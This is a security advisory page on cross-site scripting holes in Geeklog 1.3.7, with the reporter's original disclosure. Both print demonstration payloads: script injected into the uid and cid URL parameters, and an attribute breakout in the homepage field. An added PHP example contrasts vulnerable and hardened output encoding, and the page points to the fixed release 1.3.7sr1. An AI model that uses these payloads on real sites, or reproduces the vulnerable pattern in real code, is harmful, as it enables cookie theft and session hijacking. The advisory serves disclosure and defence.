SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Forum/Board/Portal) > Geeklog
Vendors:   Geeklog
Geeklog Input Validation Holes in Various Scripts Allow Remote Users to Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1005925
SecurityTracker URL:  http://securitytracker.com/id/1005925
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 16 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 1.3.7
Description:   Several input validation flaws were reported in the Geeklog web forum software. A remote user can conduct cross-site scripting attacks.

It is reported that several of the scripts and also the user's 'homepage' field do not properly filter HTML code from user-supplied input.

According to the report, the following parameters are affected:

1) The uid field in profiles.php in certain cases
2) The uid field in users.php in 'profile' mode
3) The cid field in comment.php in 'Delete' mode
4) The 'homepage' field in the user's account information page

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running Geeklog and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/profiles.php?uid=<script>alert(document.cookie)</script>

http://[target]/users.php?mode=profile&uid=<script>alert(document.cookie)</script>

http://[target]//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>

http://[target]//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>

Also, as a demonstration exploit, the following javascript can be placed in the user's 'homepage' field:

http://url" onmouseover="alert(document.cookie)
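As an added illustration (not Geeklog's code and not part of the original advisory), the PHP fragment below reproduces the two rendering patterns described above, a uid value echoed straight into the page and a homepage value placed inside an href attribute, beside a hardened version that validates uid as an integer and HTML-encodes the homepage with ENT_QUOTES so the quote-and-attribute breakout shown in the demonstration string is neutralised. The function names and the two input values are constructed for this example.

```php
<?php
// Added example, not Geeklog code. Shows why the advisory's two bug classes
// arise and how output encoding / input validation closes them.

// Constructed inputs, taken from the advisory's demonstration strings.
$reflectedUid  = '<script>alert(document.cookie)</script>';
$homepageField = 'http://url" onmouseover="alert(document.cookie)';

// Vulnerable pattern: untrusted values concatenated straight into HTML.
function renderProfileVulnerable(string $uid, string $homepage): string
{
    return "<h2>Profile for user $uid</h2>\n"
         . "<a href=\"$homepage\">Homepage</a>\n";
}

// Hardened pattern:
//  1. uid is an identifier, so it is accepted only as a positive integer;
//     any other input is rejected and nothing from it is echoed back.
//  2. homepage is free text that lands inside an attribute, so it is
//     HTML-encoded with ENT_QUOTES (double AND single quotes become entities),
//     which is what defeats the  ..." onmouseover="...  attribute breakout.
//     The scheme is additionally restricted to http/https so that a
//     javascript: URL cannot be smuggled through a correctly quoted href.
function renderProfileHardened(string $uid, string $homepage): string
{
    if (!preg_match('/^[1-9][0-9]*$/', $uid)) {
        return "<p>Invalid user id.</p>\n"; // fixed text, input not reflected
    }
    $safeUid = (int) $uid;

    $link = '';
    if (preg_match('#^https?://#i', $homepage)) {
        $encoded = htmlspecialchars($homepage, ENT_QUOTES, 'UTF-8');
        $link = "<a href=\"$encoded\">Homepage</a>\n";
    }
    return "<h2>Profile for user $safeUid</h2>\n" . $link;
}

echo "--- vulnerable ---\n", renderProfileVulnerable($reflectedUid, $homepageField);
echo "--- hardened (bad uid) ---\n", renderProfileHardened($reflectedUid, $homepageField);
echo "--- hardened (uid 42) ---\n", renderProfileHardened('42', $homepageField);
```

In the hardened output the homepage value appears as `http://url&quot; onmouseover=&quot;alert(document.cookie)`, which the browser treats as part of the href string rather than as a new attribute.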

According to the report, two of these bugs were found by Dirk Haun of the Geeklog Team.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running Geeklog, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has released a fixed version (1.3.7sr1), available at:

http://www.geeklog.net/filemgmt/singlefile.php?lid=101

Vendor URL:  www.geeklog.net/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


Source Message Contents

Subject:  Multiple XSS in Geeklog 1.3.7

nothing new. typical XSS bugs.

summary
=======

Geeklog is a web portal system written in PHP.
There exist 5 XSS holes in the software.


the 'holes'
===========

--1--
http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)</script>

--2--
http://vulnerable.host/users.php?mode=profile&uid=<script>alert(document.cookie)</script>

--3--
http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>


--4--
http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>

--5--
'homepage' field in the user's account information page
is not sanitised properly. As a result, javascript can
be injected by setting the 'homepage' field like this:

http://url" onmouseover="alert(document.cookie)


** 3) & 4) were found by Dirk Haun of Geeklog Team. 


vendor status
=============

03/01/2003
contacted Dirk Haun of Geeklog team 
14/01/2003
Geeklog 1.3.7sr1 was released.
New version closes all holes found.


--==snooq==--

Copyright 2019, SecurityGlobal.net LLC